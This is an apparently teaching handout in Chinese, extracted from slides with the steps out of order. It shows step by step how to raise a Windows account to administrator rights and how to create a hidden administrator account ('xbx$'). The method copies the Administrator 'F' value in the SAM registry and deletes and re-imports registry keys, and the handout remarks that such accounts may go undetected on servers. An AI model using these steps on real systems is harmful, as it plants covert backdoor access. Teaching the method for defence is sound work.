到了这里需要解释一下:虽然test用户在计算机管理中看到的是属于users普通用户 组的属性,但是test用户通过刚才修改注册表的“F”选项值后是变成了管理员组的 权限,是具有管理计算机系统资源的权限。不相信的同学可以试着用test用户登录后 创建新用户看看能否创建,普通用户帐号是不能做类似这种系统管理权限的。
第二章补充知识3
任务2:创建隐藏用户帐号
1、查看用户帐号的数据项
首先我们看看管理员在注册表中的数据项,打开注册表:
HKEY_LOCAL_MACHINE\SAM\SAM,如下图:
第二章补充知识3
SAM是保存用户帐号的地方,不过这个“项”在默认情况下是不可见
的。我们如果想看内部的内容就必须首先对其授权。(建议对注册表 不是很熟悉的同学不要随便改动注册表)
选择导入文件(刚才导出注册表的三项值)
第二章补充知识3
三个注册表项都导入后,进入计算机管理本地用户和组用户, 刚才导入的用户xbx$并不能看到。
第二章补充知识3
用命令net user,查看一下导入的用户xbx$也不能看到。
第二章补充知识3
虽然通过各种方式都没有查看到刚才导入的用户xbx$,但是我们却
找到HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
这个项,打开“000001f4”项,然后再打开“F”,如下图:
然后将这里面的值,全选,复制到”xbx$”帐号“000003f6”的”F”值中,覆 盖原来的值。
第二章补充知识3
4、导出注册表值 现在将注册表中的“000001f4”、“000003f6”和“xbx$”这三项注册 表值导出并保存好,后面要用到。如下图:
第二章补充知识3
进入计算机管理本地用户和组用户,可以看到刚才创建的用户
xbx$不存在了。
第二章补充知识3
重新进入注册表,找到HKEY_LOCAL_MACHINE\SAM\SAM\Domains\
Account\Users 这个项,也没有看见用户xbx$了,说明系统刚才创
建的用户xbx$帐号彻底从系统中删除了。
应的数据项。每一个用户帐号在注册表中都有自己帐号数据项。
第二章补充知识3
任务1:创建测试用户帐号
1、开始运行CMD:
2、创建测试用户test,密码123,如下图:
命令:net user test 123 /add的意思是创建用户帐号名为test,123是帐号登录密码。 命令:net user是查看系统本地用户帐号,回车后分列显示出所有的帐号。
第二章补充知识3
8、进入计算机管理本地用户和组用户,可以看到刚才创建的用 户,如下图:
第二章补充知识3
9、把Administrator帐号的类型“000001F4”项目下的“F”选项值复 制到创建的用户“test”的类型“000003FE”项目下的“F”选项值中, 确定。
第二章补充知识3
10、关闭注册表,注销,用test帐号登录,如图:
7、点击000001F4项目,选择右窗格的的“F”选项,可以看到管理员 的有关权限值。
说明一下:管理员Administrator帐号的类型值是“000001F4”,“F”代表权 限的配置属性。因此,对于一个新创建的用户“ABC”来说,想把权限升级为管理 员的权限,可以把Administrator帐号的类型“000001F4”项目下的“F”选项 值复制到创建的用户“ABC”的类型项目下的“F”选项值中。
户帐号,还需要解释一下:隐藏帐号对服务器来说是很重
要的,想能过帐号登录的人不知道帐号就无法登录进入计 算机。隐藏帐号不是永远隐藏的,一般来说,重启计算机 后就会出现,因为重启计算机,系统检测注册表,对于人 为修改的一些数据进行修复与系统的其他配置一致。但是 对于服务器一般很少重启,所以可能长期不被发现隐藏帐 号。
第二章补充知识3
2、认识注册表中的帐号分类 在OS中的用户帐号无论是内置帐号,还是后建帐号,在注册表中都
能看见。不过有两个帐号大家一定要能够认识,那就是管理员帐号
和guest帐号,如下图:
在这个图中”000001fa4”表示的是管理员帐号,即使管理员帐号被重命名了这个值 也是不会变的,所以我们可以通过这个值来判断,重命名后的管理员帐号。 “000001fa5”表示的是guest帐号,同样这个值也不会因为,来宾帐号给重命名而 改变。剩下的其 它值基本上就是后来创建的用户帐号,生成值了。 认识了注册表后, 现在我们就来利用”net user”命令创建帐号了,创建隐藏帐号必须在CMD下。
户添加到管理组,以便让我们创建用户具备管理员权限。
(3)、观察注册表中的变化,并对注册表做相应的修改。 HKEY_LOCAL_MACHINE\SAM\SAM,找到我们刚刚创建的用户帐号
在这幅图中我们可以看见”000003f6”就是我们刚新建立的”xbx$”帐号。
第二章补充知识3
4、在注册表中多帐号权限复制
第二章补充知识3
3、利用”net user”命令创建帐号 (1)、先建立隐藏用户 xbx$ 123:net user xbx$ 123,abc /add 这里的意思是说,建立个xbx$ 帐户密码是123,abc(如下图)
第二章补充知识3
(2)、C:\Documents and Settings\Administrator>net localgroup administrators xbx$ /add 这里的意思是说把xbx$用
在上图中可以看到刚才创建的用户帐号:test了,边管理员的帐号也可以看到了。上 图红圈着的是注册表记录新建帐号test的项目数据;红划线的是Administrator管理 员的项目数据。(特别提醒:对于不理解注册表的同学,不能注册表的数据进行随意 修改与删除,否则会影响系统运行。)
第二章补充知识3
5、右键HKEY_LOCAL_MACHINE\SAM\SAM,选择下拉菜单的权限,在 弹出的SAM的权限中选择管理员最高权限:Administrators完全控 制,然后确定。如图所示:
第二章补充知识3
6、此时还不能看到,需要关闭注册表,然后重新启动注册表,进入 HKEY_LOCAL_MACHINE\SAM\SAM后,即可以展开了。如图所示:
第二章补充知识3
3、进入注册表查看创建用户的情况:开始运行regedt32:
4、进入注册表后,HKEY_LOCAL_MACHINE\SAM\SAM,如下图:
在注册表的HKEY_LOCAL_MACHINE\SAM\SAM中,开始什么也看不到,原因 是因为没有查看的权限,需要添加权限。
第二章补充知识3